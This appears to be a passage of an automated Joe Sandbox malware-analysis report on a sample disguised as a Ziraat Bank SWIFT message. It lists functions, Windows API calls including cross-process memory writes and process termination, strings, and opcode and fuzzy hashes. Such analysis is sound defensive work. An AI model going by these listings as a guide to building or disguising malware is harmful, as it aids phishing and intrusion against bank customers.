DestroyEnvironmentBlock.USERENV(00000000), ref: 000DB012

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: d11ebb9fa9fb418039a39a9ee0bdd53a269ee6bcab4c4a142e5e591009cc541d
Instruction ID: 5265aec983533e795920d9a9822fd8f2199e497402d5cb56dfd539ffc5bed149
Opcode Fuzzy Hash: d11ebb9fa9fb418039a39a9ee0bdd53a269ee6bcab4c4a142e5e591009cc541d
Instruction Fuzzy Hash: 36215072200309BFDF518F94ED09FDE7BA9EF45314F144066F901A2261C3759D65DB61

Function 0010EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 000BAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 000BAFE3
Part of subcall function 000BAF83: SelectObject.GDI32(?,00000000), ref: 000BAFF2
Part of subcall function 000BAF83: BeginPath.GDI32(?), ref: 000BB009
Part of subcall function 000BAF83: SelectObject.GDI32(?,00000000), ref: 000BB033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0010EC20
LineTo.GDI32(00000000,00000003,?), ref: 0010EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0010EC42
LineTo.GDI32(00000000,00000000,?), ref: 0010EC52
EndPath.GDI32(00000000), ref: 0010EC62
StrokePath.GDI32(00000000), ref: 0010EC72

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: a6a5a2df6960749d438adfc1a5325315870ed6bb90db7938fccff11cf7b389e8
Instruction ID: f965f24f4f34664ec6d052e3b77f4b978520760b96a32689994e08855107e236
Opcode Fuzzy Hash: a6a5a2df6960749d438adfc1a5325315870ed6bb90db7938fccff11cf7b389e8
Instruction Fuzzy Hash: 80110C76000149BFEB119F90ED88EEA7F6DEB08350F048112FA4845570D7B19DA6DBA0

Function 000DE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 000DE1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 000DE1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000DE1D8
ReleaseDC.USER32(00000000,00000000), ref: 000DE1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 000DE1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 000DE209

Part of subcall function 000D9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,000D9A05,00000000,00000000,?,000D9DDB), ref: 000DA53A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 3a680af0ca75f8929ff40ad036ad947b7ce8158c78e731a3bba885bb17f300b5
Instruction ID: 36a5f53d1cd279535766265ee2c9c4b80edff9f6bc06d0491bcd964ecc714476
Opcode Fuzzy Hash: 3a680af0ca75f8929ff40ad036ad947b7ce8158c78e731a3bba885bb17f300b5
Instruction Fuzzy Hash: 3B018FB5A00314BFEB109BA6DC45B5EBFB9EB48351F004066EA08AB390D6709C11CBA0

Function 000C7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 000C7B47

Part of subcall function 000C123A: __initp_misc_winsig.LIBCMT ref: 000C125E
Part of subcall function 000C123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000C7F51
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000C7F65
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000C7F78
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000C7F8B
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000C7F9E
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000C7FB1
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000C7FC4
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000C7FD7
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000C7FEA
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000C7FFD
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000C8010
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000C8023
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000C8036
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000C8049
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000C805C
Part of subcall function 000C123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 000C806F

__mtinitlocks.LIBCMT ref: 000C7B4C

Part of subcall function 000C7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0015AC68,00000FA0,?,?,000C7B51,000C5E77,00156C70,00000014), ref: 000C7E41

__mtterm.LIBCMT ref: 000C7B55

Part of subcall function 000C7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000C7B5A,000C5E77,00156C70,00000014), ref: 000C7D3F
Part of subcall function 000C7BBD: _free.LIBCMT ref: 000C7D46
Part of subcall function 000C7BBD: DeleteCriticalSection.KERNEL32(0015AC68,?,?,000C7B5A,000C5E77,00156C70,00000014), ref: 000C7D68

__calloc_crt.LIBCMT ref: 000C7B7A
GetCurrentThreadId.KERNEL32 ref: 000C7BA3

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: d9154f6112b0733b76750bb177f318329cdf7547dd6632f452bc094ccdc5d9fb
Instruction ID: 061d3152926af4c427a2f0b346a447425eb611c4531418ba44709f4e0976bc50
Opcode Fuzzy Hash: d9154f6112b0733b76750bb177f318329cdf7547dd6632f452bc094ccdc5d9fb
Instruction Fuzzy Hash: 4FF06D3254D3121AE66977747C07F8E26C49F02731B20069DF968C91E3EF218C514961

Function 000A27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 000A281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 000A2825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 000A2830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 000A283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 000A2843
MapVirtualKeyW.USER32(00000012,00000000), ref: 000A284B

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 161e7a48a74b9f9b8c3fbe1ec0b0e785f378e4f5faa709f46b5da4f71418d590
Instruction ID: d0237724081e7df565ec1c722bef9f87b45a5e8a984c8e1f5a661783dde9a9b8
Opcode Fuzzy Hash: 161e7a48a74b9f9b8c3fbe1ec0b0e785f378e4f5faa709f46b5da4f71418d590
Instruction Fuzzy Hash: E20167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5

Function 000E9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 0ddd7780013041d6072cf595ed388ab3333c5b0abf1165fde628f3883c820cb7
Instruction ID: 28798aedff689dbaeb3c6893266a3594d11c1ea95d276f6289ab231aeef1aee9
Opcode Fuzzy Hash: 0ddd7780013041d6072cf595ed388ab3333c5b0abf1165fde628f3883c820cb7
Instruction Fuzzy Hash: DC01A932101211FFD7295B55FC48DEB77A9FF88701758143AF503A24A1DB749851DB91

Function 000E7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000E7C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000E7C1D
GetWindowThreadProcessId.USER32(?,?), ref: 000E7C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000E7C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000E7C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000E7C4C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 31a7d352dc2cb21217b489e87e4227ffec69295fb845ea5979d7839a329bc9c8
Instruction ID: 871045944cb99dc294d58d89922fc21c20d58f928b7ebaf7a48c78d2755b0910
Opcode Fuzzy Hash: 31a7d352dc2cb21217b489e87e4227ffec69295fb845ea5979d7839a329bc9c8
Instruction Fuzzy Hash: 25F03072141158BBE7315752EC0EEEF7B7CEFC6B11F000018F60191451E7A05A92C6B5

Function 000E9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 000E9A33
EnterCriticalSection.KERNEL32(?,?,?,?,00115DEE,?,?,?,?,?,000AED63), ref: 000E9A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00115DEE,?,?,?,?,?,000AED63), ref: 000E9A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00115DEE,?,?,?,?,?,000AED63), ref: 000E9A5E

Part of subcall function 000E93D1: CloseHandle.KERNEL32(?,?,000E9A6B,?,?,?,00115DEE,?,?,?,?,?,000AED63), ref: 000E93DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 000E9A71
LeaveCriticalSection.KERNEL32(?,?,?,?,00115DEE,?,?,?,?,?,000AED63), ref: 000E9A78

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 34869456a057ce8b6f450794526a1406da65f1f3043dcb2dbabdbd389e397f70
Instruction ID: 94ad7bc8ca60f7c280d6b2412d97014c4cba441bee7ca58a782e631f9e3fe38e
Opcode Fuzzy Hash: 34869456a057ce8b6f450794526a1406da65f1f3043dcb2dbabdbd389e397f70
Instruction Fuzzy Hash: 69F0E232141201FFD3251BA4FC8CEEB3779FF84301B540022F103A18A0CB7498A2DBA0

Function 000A1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 000BF4EA: std::exception::exception.LIBCMT ref: 000BF51E
Part of subcall function 000BF4EA: __CxxThrowException@8.LIBCMT ref: 000BF533

__swprintf.LIBCMT ref: 000A1EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 000A1D49

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 8994ddea1c4623aa954ae288fc5ae647955b54812fa7eab595884eaa245c79a9
Instruction ID: 3c7d8e7fda465854bd3e772a89aed43da35f36029985e70bacb7be1a6c8306eb
Opcode Fuzzy Hash: 8994ddea1c4623aa954ae288fc5ae647955b54812fa7eab595884eaa245c79a9
Instruction Fuzzy Hash: 20914D712082419FC728EFA4C895CEEB7F4AF96740F04492DF895972A2DB71ED44CB92

Function 000FAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000FB006
CharUpperBuffW.USER32(?,?), ref: 000FB115
VariantClear.OLEAUT32(?), ref: 000FB298

Part of subcall function 000E9DC5: VariantInit.OLEAUT32(00000000), ref: 000E9E05
Part of subcall function 000E9DC5: VariantCopy.OLEAUT32(?,?), ref: 000E9E0E
Part of subcall function 000E9DC5: VariantClear.OLEAUT32(?), ref: 000E9E1A

Strings

AUTOIT.ERROR, xrefs: 000FB11B
Incorrect Parameter format, xrefs: 000FB03E, 000FB20B

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 0b534aaee36ad310f4d3d7822fe87a34d2f3c4fd771adee8833c4a12db564058
Instruction ID: 4a8371631c6b72a9b11ddb4ba5a498a0f3547684fca219dc6873694631904ffc
Opcode Fuzzy Hash: 0b534aaee36ad310f4d3d7822fe87a34d2f3c4fd771adee8833c4a12db564058
Instruction Fuzzy Hash: DD9178306083059FCB10DF64C4819AABBF4AF89700F04882EF99A9B762DB31E945DB52

Function 000E5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BC6F4: _wcscpy.LIBCMT ref: 000BC717

_memset.LIBCMT ref: 000E5438
GetMenuItemInfoW.USER32(?), ref: 000E5467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000E5513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 000E553D

Strings

0, xrefs: 000E5430

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 6fc57faaf37d2c5359f369e2503bda115e9108898cef29088fd1775a2526d784
Instruction ID: 7ef6164c777e7796034e7617e2318336102095e2692764816075f5d9af03b01a
Opcode Fuzzy Hash: 6fc57faaf37d2c5359f369e2503bda115e9108898cef29088fd1775a2526d784
Instruction Fuzzy Hash: 3D51E572504B819FD7949B29CC416AFB7E8AF8535AF040D2DF896E31D1EBA0CD448B52

Function 0010C4D7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00BE7C20,?), ref: 0010C544
ScreenToClient.USER32(?,00000002), ref: 0010C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0010C5DA

Strings

@U=u, xrefs: 0010C630

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: @U=u
API String ID: 3880355969-2594219639
Opcode ID: ec0a53ab824f7d587f5137ca50f36cda31228e08ac151014aab21674adcf93ca
Instruction ID: dfe4796ceb706621dc5e5f1fc559a9c4c435b076550e7695b9c720b562deb1d0
Opcode Fuzzy Hash: ec0a53ab824f7d587f5137ca50f36cda31228e08ac151014aab21674adcf93ca
Instruction Fuzzy Hash: 67515E75A00205EFCF20DF68DC80AAE7BB6EB55320F148659F9959B290D7B0ED81CF90

Function 000DC410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 000DC462
__itow.LIBCMT ref: 000DC49C

Part of subcall function 000DC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 000DC753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 000DC505
__itow.LIBCMT ref: 000DC55A

Strings

@U=u, xrefs: 000DC462, 000DC505

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$__itow
String ID: @U=u
API String ID: 3379773720-2594219639
Opcode ID: 66666d5620c1ea0279c73032c4e96adb5457adcd7e891f9415bac0084e55cfec
Instruction ID: 995f585544dd9bb808c61e801ae9b5d86486d12172f2a12a059a41b1beb90cb4
Opcode Fuzzy Hash: 66666d5620c1ea0279c73032c4e96adb5457adcd7e891f9415bac0084e55cfec
Instruction Fuzzy Hash: 2F418571600709AFEF25DF94DC51FEE7BB9AF4A700F00005AF905A7292DB719A85CBA1

Function 000DC189 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000E430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000DBC08,?,?,00000034,00000800,?,00000034), ref: 000E4335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000DC1D3

Part of subcall function 000E42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000DBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 000E4300

Part of subcall function 000E422F: GetWindowThreadProcessId.USER32(?,?), ref: 000E425A
Part of subcall function 000E422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000DBBCC,00000034,?,?,00001004,00000000,00000000), ref: 000E426A
Part of subcall function 000E422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000DBBCC,00000034,?,?,00001004,00000000,00000000), ref: 000E4280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000DC240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000DC28D

Strings

@U=u, xrefs: 000DC1D3, 000DC240, 000DC28D
@, xrefs: 000DC2A5

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @$@U=u
API String ID: 4150878124-826235744
Opcode ID: 88ff85e814680587a286795942791b933f060f06aa21c095b777b24c1d8e6dcf
Instruction ID: 7bc47fc50e2064e1339a7f579399af74ee26e65c31be334420689d1cc7f14f51
Opcode Fuzzy Hash: 88ff85e814680587a286795942791b933f060f06aa21c095b777b24c1d8e6dcf
Instruction Fuzzy Hash: A1412872900219BFDB11DFA4CD81EEEB7B8EF49700F104099FA45B7281DA71AE85CB61

Function 000E0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000E027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000E02B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000E02C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000E0344

Strings

DllGetClassObject, xrefs: 000E02B7

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
